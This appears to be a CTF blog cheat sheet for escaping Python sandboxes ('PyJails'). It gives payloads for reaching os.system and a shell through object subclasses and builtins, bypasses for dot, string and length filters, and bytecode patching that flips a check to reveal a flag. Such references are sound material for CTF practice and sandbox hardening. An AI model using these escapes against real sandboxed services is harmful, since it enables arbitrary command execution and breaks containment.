keyboard_arrow_up

title: CheatSheet PyJails
date: Jul 08, 2021
tags: Writeups DamCTF CTF_review Pwn Malware Misc Reverse Web EC2_2021 CheatSheets SQLi Programming Nmap Tools PyJails HeroCTF_v3 Steganography


PyJails

python


Table of contents



Testing for python 2 or 3

print 1 # Error = python 3


Python Builtins Functions


Python 2 - Exploit

input(__import__('os').system('X'))


Usefull Functions

vars() || locals() || globals() # List python variables
dir() # List all attributes of an object
().__class__.__base__.__subclasses__() # List all classes
hex() # Convert a string to hex (Output unprintable char)


Function Informations

# Python 2
function.func_code.co_code # Get function code
function.func_code.co_varnames # Get variable name
function.func_code.co_consts # Get variable content
function.func_code.co_filename # Get file name
function.func_code.co_code # Get function bytes code
function.func_globals # List all variables informations
function.__globals__ # List all variables informations

# Python 3
function.__code__.co_code # Get function code
function.__code__.co_varnames # Get variable name
function.__code__.co_consts # Get variable content
function.__code__.co_filename # Get file name


Dot Bypass

getattr(dir({'Object'}), dir({'Object'})[{'Attribute'}])


Strings Bypass

eval('__im'+'port__')
print('__im''port__')
eval("__im"+"port__")
print("__im""port__")


Maximum Len Bypass

__builtins__['_']=().__class__
__builtins__['_']=_.__base__
__builtins__['_']=_.__subclasses__
__builtins__['_']()

x = ().__class__
x = x.__base__
...


Interesting Class

<class 'warnings.catch_warnings'> -> catch_warnings()._module.__builtins__['__import__']
<class 'warnings.catch_warnings'> -> catch_warnings().__repr__.im_func.func_globals["linecache"].os.system('XXX')
<class 'site._Printer'> -> site._Printer._Printer__setup.__globals__['os']
<class 'site.pty'> -> pty.spawn("sh")
<class 'sys'> -> sys.module


Disassembling a Function

# Python 2.X

import dis

co = {'Function name'}.__code__

co_code = co.co_code
varnames = co.co_varnames
names = co.co_names
consts = co.co_consts

dis.disassemble_string(     # Get bytes code informations
    list(co_code),
    1,
    varnames,
    names,
    consts
)

import new

co_code = list(co_code)
# Method n°1 jump
co_code[0], co_code[1], co_code[2] = list('\x71\x{jump address value}\x00')
# Method n°2 signe: = -> !=
co_code['{Signe address value}'] = '\x03'

co_argc = co.co_argcount
co_nlocal = co.co_nlocals
stack_size = co.co_stacksize
flags = co.co_flags
file_name = co.co_filename
name = co.co_name
firstlineno = co.co_firstlineno
lnotab = co.co_lnotab

def _():
    pass

_.func_code = new.code(
    co_argc,
    co_nlocal,
    stack_size,
    flags,
    ''.join(co_code),
    consts,
    names,
    varnames,
    file_name,
    name,
    firstlineno,
    lnotab
)

print('\n')
_('Give me the flag')


Other Cheat Sheet


Interesting Writeups


My PyJails Challenges

Coming Soon...